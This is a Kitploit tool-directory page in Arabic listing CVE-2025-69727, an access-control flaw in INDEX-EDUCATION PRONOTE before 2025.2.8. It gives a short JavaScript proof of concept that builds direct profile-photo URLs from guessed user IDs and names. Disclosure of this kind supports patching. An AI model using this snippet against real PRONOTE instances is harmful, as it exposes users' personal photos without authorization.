Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0xzerosec/cve-2025-69727
الاستطلاعتحليل الثغرات الأمنيةجمع المعلوماتأمن الويبسوء التكوين
GitHub0xzerosec/cve-2025-69727

CVE-2025-69727

CVE-2025-69727

عرض المستودع
22منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69727

بائع المنتج

INDEX-EDUCATION

قاعدة كود المنتج المتأثر

PRONOTE - 202X.X.X < 2025.2.8

الوصف

توجد ثغرة في التحكم غير الصحيح في الوصول في INDEX-EDUCATION PRONOTE قبل الإصدار 2025.2.8. تسمح المكونات المتأثرة (composeUrlImgPhotoIndividu) ببناء عناوين URL مباشرة لصور ملفات المستخدمين بناءً على معرفات يمكن التنبؤ بها فقط مثل معرفات المستخدم وأسمائهم. نظرًا لغياب فحوصات التفويض وعدم وجود تحديد للمعدل عند إنشاء هذه العناوين أو الوصول إليها، يمكن لأي جهة غير مصادق عليها أو غير مصرح لها استرداد صور ملفات المستخدمين عن طريق صياغة طلبات تحتوي على معرفات مخمنة أو معروفة.

PoC

root@kitploit:~
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";

IE.fModule({
  f: function (exports, require, module, global) {
    const ObjetElement = require("ObjetElement");
    const AccesApp = global.GApplication;

    const comm = AccesApp.communication;

    for (const obj of arr) {
      const path = comm.composeUrlFichierExterne(
        obj.L.replace(/[\s]/gi, "_") + ".jpg",
        new ObjetElement.ObjetElement("", obj.N)
      );

      const url = `${base}/${path}`;

      console.log(url);
    }
  },
  fn: "testIEmodule.js",
});

المكتشفون

  • raphckrman
  • GameCreep35
تنزيل الأداة